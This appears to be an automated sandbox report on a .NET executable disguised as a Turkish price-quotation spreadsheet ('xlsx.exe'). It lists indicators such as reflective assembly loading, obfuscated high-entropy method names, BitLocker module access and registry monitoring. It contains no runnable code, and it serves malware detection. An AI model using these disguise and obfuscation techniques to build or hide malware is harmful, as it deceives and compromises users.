Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, TucfSNeqMt9wmb7xnA.cs	.Net Code: lGn6g61h4T System.Reflection.Assembly.Load(byte[])
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.28449d0.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Code function: 0_2_0103F530 pushfd ; iretd

0_2_0103F531

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: section name: .text entropy: 7.9844464661439245

Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, Y5apbQjWegHFdPvvWRl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KKIeNApHjS', 'F1heWUKCjg', 'kZyedLRRG8', 'am3eldgTfT', 'ButesOdP14', 'hkLeVQnc11', 'RyQecGLXIB'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, R7kWbK7FD32e16m2uD.cs	High entropy of concatenated method names: 'oSlyhHmqqb', 'ITTyR4hPtC', 'Y4gyPN9VLZ', 'BKZyf2topn', 't9wyNLFKPh', 'a51yBKcRUX', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, d0OyUnsHiXk6GXSrY1.cs	High entropy of concatenated method names: 'AxQviLTwBE', 'Q1Qv40ZpxP', 'VqpvNw7HgY', 'K7avWOiTdE', 'gJIvR5VES9', 'WE6vPfmaZ7', 'nhQvfH7bOX', 'kpIvB0rTWM', 'xBZvwQRF2d', 'xAav0Dc2W1'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, ojvgQiz4fo796QiyxY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'prF9o0jK1U', 'tD59v1vEGf', 'n8v9xM86UC', 'NA59OjlPWA', 'PGR9yUXrbx', 'SFp991cGdw', 'dJ79eDsrAv'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, y9Ap8UavNRuNPGZkg8.cs	High entropy of concatenated method names: 'SYRIjsVxSG', 'DqfInHWOeR', 'xEBIgygu58', 'SNZImpiJCb', 'w5lIJ9Slgc', 'hJnI23MoRF', 'WPsIXbINAM', 'd2UI1ygqQo', 'VWKVgEabpPpkcvXdi0x', 'pvZZBCa6rlUCDKHplCK'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, QloNyZVyoip4Zjrf8N.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uddYbybVJx', 'py9YA2VdRq', 'LRpYzytes4', 'brxuLQPHWD', 'NnIuMoc1yZ', 'fLNuYNcohO', 'zlKuuSAi4R', 'ua4FEHmpSPBvobvg5Ef'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, gX1kCuMEOYtDh2YCB9.cs	High entropy of concatenated method names: 'kVLoZNTCgl', 'Vs6oXrbhmA', 'N3aohSkCPa', 'InIoRN6YDy', 'KkZofHAyMV', 'QOXoB5UBwJ', 'gRUo0wgvam', 'EN9oHdMJRo', 'R2eoiTKvx0', 'VtpoDpNyCU'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, lRhYI0Q82ZS9CQMrvh.cs	High entropy of concatenated method names: 'jq2IdYi3CS', 'UmYIlVrEJG', 'jZ7IsKLBbN', 'ToString', 'keVIVV8VP8', 'HrDIcNFdWk', 'tHxQw2adljxv1df1Mc2', 'hBJrjGaLR2tKo9onDaG', 'j3xs0eaOEuP0hRnYNnt'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, Eg32AZ3VE7tJNcho4Z.cs	High entropy of concatenated method names: 'yykKNMWGF2', 'oBnKWjDgek', 'KWDKdJVM2n', 'xQPKla8TtZ', 'vAwKspyeZG', 'QhyKVJQpjx', 'aZ5KcNTAv6', 'sJ1KEMBBZh', 'AgmKb8EdSA', 'xemKArm5Yy'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, D3S8ceuBOMQkX3uhsR.cs	High entropy of concatenated method names: 'ppeyCcyOgO', 'oMGyKPEgNf', 'I0Xy5kPddV', 'MxAyF4FRqq', 'rlAyI7Dxgk', 'NEWyp6vHo7', 'qYHyTg6qiY', 'jiyyavVeDB', 'sAlyQtyurJ', 'POrytorhKB'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, xfcuZHPI6XjDeysgsY.cs	High entropy of concatenated method names: 'mFhpnICB6c', 'ADxpSRAMif', 'obZpgWWMJf', 'xhppmiWbFR', 'ILnpGyHryT', 'jd5pJ4SCNq', 'AIYp2Gmt28', 'MtdpZneuDd', 'SPNpX4lmio', 'LJIp1kOCTa'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, b2LBV0jjYxwqi6oa9Vc.cs	High entropy of concatenated method names: 'ToString', 'DIJeu6V1lg', 'rYqe6Kocep', 'K7Ve8VNLn8', 'smbeCfIcQp', 'uZHeKeYcQw', 'c2Ze5UmyEl', 'hmLeFvsPUc', 'w2B8i4y8qP2lZ6iSmEH', 'C8YijayYxYgGbTxHVIi'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, vICAAsbJZCf9L4FA9P.cs	High entropy of concatenated method names: 'Dispose', 'r8TMbgURh3', 'KhXYRgCTmF', 'lgxkkuL20Q', 'Iu8MAYmQ3g', 'cnbMzOoXcw', 'ProcessDialogKey', 'zoaYLTUZRp', 'FI3YM3eLj1', 'sLoYYO9TwE'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, XvgdNVGErGfBUMMcmY.cs	High entropy of concatenated method names: 'RXoM1KaQioAXWsdpdCL', 'hMKCDJa4ps62B1rrPhV', 'dj5NecaS1ATlU2FIIEJ', 'OvqIyFc9pa', 'GQ1I9crWBt', 'CA8IeQgbEV', 'Q6OQoaaqrBp5Y5Z1tH4', 'llVTfraTwk49B1h1iFg'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, i2uIeu09J2hevpq6Y6.cs	High entropy of concatenated method names: 'uctMpSfsee', 'VbaMTJGSST', 'E5MMQAJiWY', 'ysdMtcBAd4', 'RHCMvIZGW9', 'K0IMxMBQpV', 's9G8GAfMgoENF0APSt', 'BKBs0RlrqbvjMAHXZu', 'zgyaXIKxKoOONiqG53', 'uirMMnjB7y'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, eLeLkIZBDCXijV2Xjy.cs	High entropy of concatenated method names: 'M7HI8Wdhlv', 'ubTIKfdrR0', 'dWYIFXFXiy', 'kamIpiOFH5', 'hcLITr0ks3', 'SSMFsFyUh0', 'sxhFVPcv5p', 'r9KFcXsHd6', 'NraFEFc64w', 'Kw5FbWY11i'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, K856vDNhK1Rx5nI99Z.cs	High entropy of concatenated method names: 'SmcpCCNtUo', 'pCbp5VsxKF', 'IulpIprg1H', 'z7MIAYO8Tv', 'wsKIzsQqdw', 'VMRpLnd7dh', 'pIupMEDLw6', 'kn0pY0uNqL', 'BWdpuUTf80', 'vqmp65mCHO'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, w8B95JyHCrohgEWweo.cs	High entropy of concatenated method names: 'WNoFGWlkH4', 'wXDF2tnVwJ', 'UoL5PoRX24', 'l0d5fClMEy', 'fJF5BZfWHc', 'sDA5wbeXIo', 'zKM50Z3WKX', 'HDK5H12f9m', 'Q3Y5372qRT', 'hNe5iKxK3g'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, TucfSNeqMt9wmb7xnA.cs	High entropy of concatenated method names: 'uMBu8Rt4oo', 'DvSuCIYfAy', 'aXEuKj40M5', 'TKau5TmJO8', 'BCEuFqA7rC', 'TqWuISq9pa', 'pqNupkbGwt', 'WWZuTvxr4H', 'h5duay3Nk7', 'bUIuQKxrIw'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, mThtq8FQIyVrHQWEh9.cs	High entropy of concatenated method names: 'RsTOEOMoT4', 'vuoOA8KJYQ', 'REyyLVdCJK', 'R0NyMTJrtA', 'hZvODeOkYE', 'mPFO4BQ6Sm', 'X21O7aZhU2', 'X32ONu9SiV', 'KO8OWIaYH7', 'YFUOdBBD6A'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, OEWbdXRZoZKorpKpKb.cs	High entropy of concatenated method names: 'ToString', 'fKTxD6JKs6', 'GIpxRbiDeL', 'AVFxP7K3Ha', 'a9hxfPP94F', 'WA6xBI2VN3', 'NYixwwdmBH', 'yUdx0RcEFv', 'Bf9xHqwsP7', 'nVcx3dFqro'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, YTxZkKl8MORpMRYJKr.cs	High entropy of concatenated method names: 'wWE9Mhfgn4', 'Fq69uBXqgo', 'vYi96pIw8H', 'dat9CECFH0', 'LHV9KbZKh3', 'WQl9FTx2PO', 'kUD9ICD8UC', 'KDhycw6bnf', 'KqTyEmi9LL', 'GTmybLFcS4'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, nZLshlvWFIXMKa6mV6.cs	High entropy of concatenated method names: 'DVegThmFo', 'Mg3mP5nKy', 'Df3J8DheE', 'zqx24Wg2F', 'jx7XTtkOD', 'qA71IPnVg', 'Pk3lyw3YA7Mat3IHcH', 'CRJGk3WdJdLIZsCY9P', 'pdGyBZQyi', 'Kd5eUnuVR'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, SNLrwMCKxEMFBjyART.cs	High entropy of concatenated method names: 'twK5maAuTj', 'FGo5J8GiHK', 'eMo5ZweHmG', 'UpL5X9uFSy', 'Pqp5vWiP3b', 'Ipd5xw3O0N', 'Fc15OMBHLE', 'Mj65yZb0YQ', 'C8659XJp1O', 'N9y5ev5a37'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, Yf9VmijcZv3rrdRA9m6.cs	High entropy of concatenated method names: 'Pfe9naQrNP', 'S679Se8jls', 'iMb9grZiac', 'Kxe9mBn7Ms', 'kD99G5kSQ3', 'Q9X9Jn4QPB', 'CYG92NvGZC', 'WFV9ZShsrY', 'fDR9XHd6tP', 'DW291QqGFN'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, Y5apbQjWegHFdPvvWRl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KKIeNApHjS', 'F1heWUKCjg', 'kZyedLRRG8', 'am3eldgTfT', 'ButesOdP14', 'hkLeVQnc11', 'RyQecGLXIB'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, R7kWbK7FD32e16m2uD.cs	High entropy of concatenated method names: 'oSlyhHmqqb', 'ITTyR4hPtC', 'Y4gyPN9VLZ', 'BKZyf2topn', 't9wyNLFKPh', 'a51yBKcRUX', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, d0OyUnsHiXk6GXSrY1.cs	High entropy of concatenated method names: 'AxQviLTwBE', 'Q1Qv40ZpxP', 'VqpvNw7HgY', 'K7avWOiTdE', 'gJIvR5VES9', 'WE6vPfmaZ7', 'nhQvfH7bOX', 'kpIvB0rTWM', 'xBZvwQRF2d', 'xAav0Dc2W1'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, ojvgQiz4fo796QiyxY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'prF9o0jK1U', 'tD59v1vEGf', 'n8v9xM86UC', 'NA59OjlPWA', 'PGR9yUXrbx', 'SFp991cGdw', 'dJ79eDsrAv'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, y9Ap8UavNRuNPGZkg8.cs	High entropy of concatenated method names: 'SYRIjsVxSG', 'DqfInHWOeR', 'xEBIgygu58', 'SNZImpiJCb', 'w5lIJ9Slgc', 'hJnI23MoRF', 'WPsIXbINAM', 'd2UI1ygqQo', 'VWKVgEabpPpkcvXdi0x', 'pvZZBCa6rlUCDKHplCK'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, QloNyZVyoip4Zjrf8N.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uddYbybVJx', 'py9YA2VdRq', 'LRpYzytes4', 'brxuLQPHWD', 'NnIuMoc1yZ', 'fLNuYNcohO', 'zlKuuSAi4R', 'ua4FEHmpSPBvobvg5Ef'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, gX1kCuMEOYtDh2YCB9.cs	High entropy of concatenated method names: 'kVLoZNTCgl', 'Vs6oXrbhmA', 'N3aohSkCPa', 'InIoRN6YDy', 'KkZofHAyMV', 'QOXoB5UBwJ', 'gRUo0wgvam', 'EN9oHdMJRo', 'R2eoiTKvx0', 'VtpoDpNyCU'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, lRhYI0Q82ZS9CQMrvh.cs	High entropy of concatenated method names: 'jq2IdYi3CS', 'UmYIlVrEJG', 'jZ7IsKLBbN', 'ToString', 'keVIVV8VP8', 'HrDIcNFdWk', 'tHxQw2adljxv1df1Mc2', 'hBJrjGaLR2tKo9onDaG', 'j3xs0eaOEuP0hRnYNnt'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, Eg32AZ3VE7tJNcho4Z.cs	High entropy of concatenated method names: 'yykKNMWGF2', 'oBnKWjDgek', 'KWDKdJVM2n', 'xQPKla8TtZ', 'vAwKspyeZG', 'QhyKVJQpjx', 'aZ5KcNTAv6', 'sJ1KEMBBZh', 'AgmKb8EdSA', 'xemKArm5Yy'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, D3S8ceuBOMQkX3uhsR.cs	High entropy of concatenated method names: 'ppeyCcyOgO', 'oMGyKPEgNf', 'I0Xy5kPddV', 'MxAyF4FRqq', 'rlAyI7Dxgk', 'NEWyp6vHo7', 'qYHyTg6qiY', 'jiyyavVeDB', 'sAlyQtyurJ', 'POrytorhKB'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, xfcuZHPI6XjDeysgsY.cs	High entropy of concatenated method names: 'mFhpnICB6c', 'ADxpSRAMif', 'obZpgWWMJf', 'xhppmiWbFR', 'ILnpGyHryT', 'jd5pJ4SCNq', 'AIYp2Gmt28', 'MtdpZneuDd', 'SPNpX4lmio', 'LJIp1kOCTa'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, b2LBV0jjYxwqi6oa9Vc.cs	High entropy of concatenated method names: 'ToString', 'DIJeu6V1lg', 'rYqe6Kocep', 'K7Ve8VNLn8', 'smbeCfIcQp', 'uZHeKeYcQw', 'c2Ze5UmyEl', 'hmLeFvsPUc', 'w2B8i4y8qP2lZ6iSmEH', 'C8YijayYxYgGbTxHVIi'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, vICAAsbJZCf9L4FA9P.cs	High entropy of concatenated method names: 'Dispose', 'r8TMbgURh3', 'KhXYRgCTmF', 'lgxkkuL20Q', 'Iu8MAYmQ3g', 'cnbMzOoXcw', 'ProcessDialogKey', 'zoaYLTUZRp', 'FI3YM3eLj1', 'sLoYYO9TwE'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, XvgdNVGErGfBUMMcmY.cs	High entropy of concatenated method names: 'RXoM1KaQioAXWsdpdCL', 'hMKCDJa4ps62B1rrPhV', 'dj5NecaS1ATlU2FIIEJ', 'OvqIyFc9pa', 'GQ1I9crWBt', 'CA8IeQgbEV', 'Q6OQoaaqrBp5Y5Z1tH4', 'llVTfraTwk49B1h1iFg'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, i2uIeu09J2hevpq6Y6.cs	High entropy of concatenated method names: 'uctMpSfsee', 'VbaMTJGSST', 'E5MMQAJiWY', 'ysdMtcBAd4', 'RHCMvIZGW9', 'K0IMxMBQpV', 's9G8GAfMgoENF0APSt', 'BKBs0RlrqbvjMAHXZu', 'zgyaXIKxKoOONiqG53', 'uirMMnjB7y'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, eLeLkIZBDCXijV2Xjy.cs	High entropy of concatenated method names: 'M7HI8Wdhlv', 'ubTIKfdrR0', 'dWYIFXFXiy', 'kamIpiOFH5', 'hcLITr0ks3', 'SSMFsFyUh0', 'sxhFVPcv5p', 'r9KFcXsHd6', 'NraFEFc64w', 'Kw5FbWY11i'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, K856vDNhK1Rx5nI99Z.cs	High entropy of concatenated method names: 'SmcpCCNtUo', 'pCbp5VsxKF', 'IulpIprg1H', 'z7MIAYO8Tv', 'wsKIzsQqdw', 'VMRpLnd7dh', 'pIupMEDLw6', 'kn0pY0uNqL', 'BWdpuUTf80', 'vqmp65mCHO'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, w8B95JyHCrohgEWweo.cs	High entropy of concatenated method names: 'WNoFGWlkH4', 'wXDF2tnVwJ', 'UoL5PoRX24', 'l0d5fClMEy', 'fJF5BZfWHc', 'sDA5wbeXIo', 'zKM50Z3WKX', 'HDK5H12f9m', 'Q3Y5372qRT', 'hNe5iKxK3g'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, TucfSNeqMt9wmb7xnA.cs	High entropy of concatenated method names: 'uMBu8Rt4oo', 'DvSuCIYfAy', 'aXEuKj40M5', 'TKau5TmJO8', 'BCEuFqA7rC', 'TqWuISq9pa', 'pqNupkbGwt', 'WWZuTvxr4H', 'h5duay3Nk7', 'bUIuQKxrIw'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, mThtq8FQIyVrHQWEh9.cs	High entropy of concatenated method names: 'RsTOEOMoT4', 'vuoOA8KJYQ', 'REyyLVdCJK', 'R0NyMTJrtA', 'hZvODeOkYE', 'mPFO4BQ6Sm', 'X21O7aZhU2', 'X32ONu9SiV', 'KO8OWIaYH7', 'YFUOdBBD6A'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, OEWbdXRZoZKorpKpKb.cs	High entropy of concatenated method names: 'ToString', 'fKTxD6JKs6', 'GIpxRbiDeL', 'AVFxP7K3Ha', 'a9hxfPP94F', 'WA6xBI2VN3', 'NYixwwdmBH', 'yUdx0RcEFv', 'Bf9xHqwsP7', 'nVcx3dFqro'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, YTxZkKl8MORpMRYJKr.cs	High entropy of concatenated method names: 'wWE9Mhfgn4', 'Fq69uBXqgo', 'vYi96pIw8H', 'dat9CECFH0', 'LHV9KbZKh3', 'WQl9FTx2PO', 'kUD9ICD8UC', 'KDhycw6bnf', 'KqTyEmi9LL', 'GTmybLFcS4'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, nZLshlvWFIXMKa6mV6.cs	High entropy of concatenated method names: 'DVegThmFo', 'Mg3mP5nKy', 'Df3J8DheE', 'zqx24Wg2F', 'jx7XTtkOD', 'qA71IPnVg', 'Pk3lyw3YA7Mat3IHcH', 'CRJGk3WdJdLIZsCY9P', 'pdGyBZQyi', 'Kd5eUnuVR'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, SNLrwMCKxEMFBjyART.cs	High entropy of concatenated method names: 'twK5maAuTj', 'FGo5J8GiHK', 'eMo5ZweHmG', 'UpL5X9uFSy', 'Pqp5vWiP3b', 'Ipd5xw3O0N', 'Fc15OMBHLE', 'Mj65yZb0YQ', 'C8659XJp1O', 'N9y5ev5a37'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, Yf9VmijcZv3rrdRA9m6.cs	High entropy of concatenated method names: 'Pfe9naQrNP', 'S679Se8jls', 'iMb9grZiac', 'Kxe9mBn7Ms', 'kD99G5kSQ3', 'Q9X9Jn4QPB', 'CYG92NvGZC', 'WFV9ZShsrY', 'fDR9XHd6tP', 'DW291QqGFN'

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	File created: \abh projesi_slg6%0190%_fiyat teklif - po240017 xlsx.exe
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	File created: \abh projesi_slg6%0190%_fiyat teklif - po240017 xlsx.exe
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	File created: \abh projesi_slg6%0190%_fiyat teklif - po240017 xlsx.exe	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	File created: \abh projesi_slg6%0190%_fiyat teklif - po240017 xlsx.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
